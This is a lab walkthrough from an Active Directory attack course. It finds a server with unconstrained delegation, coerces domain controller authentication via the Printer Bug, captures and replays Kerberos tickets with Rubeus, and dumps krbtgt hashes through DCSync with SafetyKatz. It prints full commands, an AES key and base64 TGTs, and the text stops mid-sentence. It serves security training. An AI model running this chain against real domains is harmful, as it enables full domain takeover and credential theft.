15 - LO1️5️

Learning Object 15

Tasks

1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled

2 - Compromise the server and escalate to Domain Admin privileges

3 - Escalate to Enterprise Admins privileges by abusing Printer Bug

Flag 24 [dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩

Flag 25 [dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩

Solutions

1 - Find a server in the dcorp domain where Unconstrained Delegation is enabled

Starting to find a server that has unconstrained delegation enabled:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1
Get-DomainComputer -Unconstrained | select -ExpandProperty name

• DCORP-DC

• DCORP-APPSRV

2 - Compromise the server and escalate to Domain Admin privileges

Remembering that the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv.

We extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check if anyone of them have local admin privileges on dcorp-appsrv.

First, we will try with appadmin. Run the below command from an elevated command prompt:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

and Run the below commands in the new process:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

We can use multiple methods now to copy Rubeus to dcorp-appsrv to abuse Printer Bug using Loader and winrs.

Run the below command from the process running appadmin:

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-appsrv\C$\Users\Public\Loader.exe /Y

Run Rubeus in listener mode in the winrs session on dcorp-appsrv:

winrs -r:dcorp-appsrv cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.67
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

Now, we can use the Printer Bug for Coercion, so on the student VM, use MS-RPRN to force authentication from dcorp-dc$ (remember to charge program into HFS every time)

C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

On the Rubeus listener, we can see the TGT of dcorp-dc$:

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

Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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

Now, we can run DCSync from this process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit"

3 - Escalate to Enterprise Admins privileges by abusing Printer Bug

To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listern for mcorp-dc$ tickets on dcorp-appsrv:

winrs -r:dcorp-appsrv cmd
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args monitor /targetuser:MCORP-DC$ /interval:5 /nowrap

Use MS-RPRN on the student VM to trigger authentication from mcorp-dc to dcorp-appsrv

C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

On the Rubeus listener, we can see the TGT of mcorp-dc$:

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

As previously, copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args ptt /ticket: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

Now, we can run DCSync from this process:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::evasive-dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

We escalated to Enterprise Admins too.

Flag 24 [dcorp-appsrv] - Domain user who is a local admin on dcorp-appsrv 🚩

Based on the previous task, we know that domain user who is a local admin on dcorp-appsrv is: appXXX

Flag 25 [dcorp-appsrv] - Which user's credentials are compromised by using the printer bug for compromising dollarcorp 🚩

Checking the previous task, in details the output of Rubeus listener, we can see the TGT of dcorp-dc$: